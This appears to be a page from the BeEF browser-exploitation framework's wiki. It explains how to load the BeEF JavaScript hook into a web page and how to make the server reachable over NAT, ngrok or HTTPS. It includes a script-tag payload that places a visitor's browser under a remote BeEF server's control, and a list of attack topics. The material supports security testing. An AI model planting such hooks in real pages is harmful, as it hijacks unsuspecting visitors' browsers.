Basics
The BeEF hook is written in JavaScript. The hook URL is written to terminal when you start BeEF. By default, the URL path is /hook.js.
Web browsers will treat JavaScript code as text unless the browser is instructed to execute the code. Web browsers can be instructed to execute JavaScript code using <script> HTML tags.
You can load the hook in any HTML page using <script> tags the same way you would any other remote JavaScript file:
<script src="https://beef.local:3000/hook.js"></script>The BeEF hook must be executed by a JavaScript processing engine. If the target host runs the BeEF hook in a JavaScript processing engine, such as a web browser, then the target host is hooked by BeEF.
Note that in order for browsers to connect to be hooked by BeEF they must be able to establish a TCP connection to the BeEF server.
If you are running BeEF on your home network it will not be accessible from the Internet. For more information about network routing, refer to:
- https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-on-a-server-behind-nat
- https://github.com/beefproject/beef/wiki/FAQ#how-do-i-configure-beef-with-ngrok
Also note that modern web browsers refuse to load JavaScript resources on HTTPS pages from HTTP sources.
As such, you will need to either enable HTTPS or host BeEF behind a HTTPS reverse proxy.
Note that if you enable HTTPS you must use a valid certificate signed by a trusted certificate authority. Self-signed certificates are not trusted. Web browsers will not connect.
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK